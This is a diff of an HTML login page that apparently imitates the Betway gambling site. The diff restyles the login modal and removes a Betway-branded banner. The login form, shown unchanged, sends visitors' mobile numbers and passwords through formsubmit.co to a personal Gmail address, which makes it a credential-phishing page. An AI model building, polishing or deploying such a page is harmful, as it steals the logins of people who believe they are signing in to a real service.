--- a/index.html
+++ b/index.html
@@ -2,10 +2,9 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Login</title>
+  <title>Login - Floating</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
-
   <style>
     * {
       box-sizing: border-box;
@@ -14,29 +13,31 @@
 
     body {
       margin: 0;
-      background: #f1f1f1;
+      background: url('https://backround/images/home-hero/hero-bg-desktop.jpg') no-repeat center center fixed;
+      background-size: cover;
     }
 
     .modal-overlay {
-      position: fixed;
-      bottom: 0;
-      left: 0;
-      right: 0;
-      background: white;
-      border-top-left-radius: 20px;
-      border-top-right-radius: 20px;
-      box-shadow: 0 -4px 10px rgba(0, 0, 0, 0.2);
-      max-width: 480px;
-      margin: auto;
-      animation: slideUp 0.4s ease;
+      position: absolute;
+      top: 50%;
+      left: 50%;
+      transform: translate(-50%, -50%);
+      background: rgba(255, 255, 255, 0.98);
+      border-radius: 20px;
+      box-shadow: 0 8px 24px rgba(0, 0, 0, 0.3);
+      width: 90%;
+      max-width: 400px;
+      animation: fadeIn 0.4s ease;
     }
 
-    @keyframes slideUp {
+    @keyframes fadeIn {
       from {
-        transform: translateY(100%);
+        opacity: 0;
+        transform: translate(-50%, -40%);
       }
       to {
-        transform: translateY(0);
+        opacity: 1;
+        transform: translate(-50%, -50%);
       }
     }
 
@@ -166,43 +167,11 @@
       margin-left: 4px;
     }
 
-    /* Sticky Banner */
-    .sticky-banner {
-      position: fixed;
-      bottom: 0;
-      left: 0;
-      right: 0;
-      background: #fff;
-      padding: 10px 16px;
-      border-top: 1px solid #ccc;
-      display: flex;
-      align-items: center;
-      justify-content: space-between;
-      font-size: 14px;
-      max-width: 480px;
-      margin: auto;
-    }
-
-    .sticky-banner img {
-      width: 24px;
-      height: 24px;
-      margin-right: 8px;
-    }
-
-    .sticky-banner .close {
-      background: transparent;
-      border: none;
-      font-size: 18px;
-      cursor: pointer;
-    }
-
-    /* Responsive layout */
-    @media (min-width: 600px) {
+    @media (max-width: 480px) {
       .modal-overlay {
-        top: 10%;
-        transform: translateY(0);
-        max-width: 400px;
-        border-radius: 16px;
+        top: auto;
+        bottom: 20px;
+        transform: translate(-50%, 0);
       }
     }
   </style>
@@ -212,7 +181,7 @@
   <div class="modal-overlay">
     <div class="modal-header">
       Login
-      <button onclick="closeModal()">×</button>
+      <button onclick="document.querySelector('.modal-overlay').style.display='none'">×</button>
     </div>
 
     <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
@@ -267,15 +236,6 @@
     </div>
   </div>
 
-  <!-- Sticky bottom banner -->
-  <div class="sticky-banner" id="banner">
-    <div>
-      <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6a/Betway_logo.svg/2560px-Betway_logo.svg.png" alt="Betway" height="24">
-      Add Betway to Home screen
-    </div>
-    <button class="close" onclick="document.getElementById('banner').style.display='none'">×</button>
-  </div>
-
   <script>
     function validateForm(event) {
       const mobile = document.getElementById('mobile');
@@ -308,10 +268,6 @@
     function togglePassword() {
       const pwd = document.getElementById('password');
       pwd.type = pwd.type === 'password' ? 'text' : 'password';
-    }
-
-    function closeModal() {
-      document.querySelector('.modal-overlay').style.display = 'none';
     }
   </script>
 
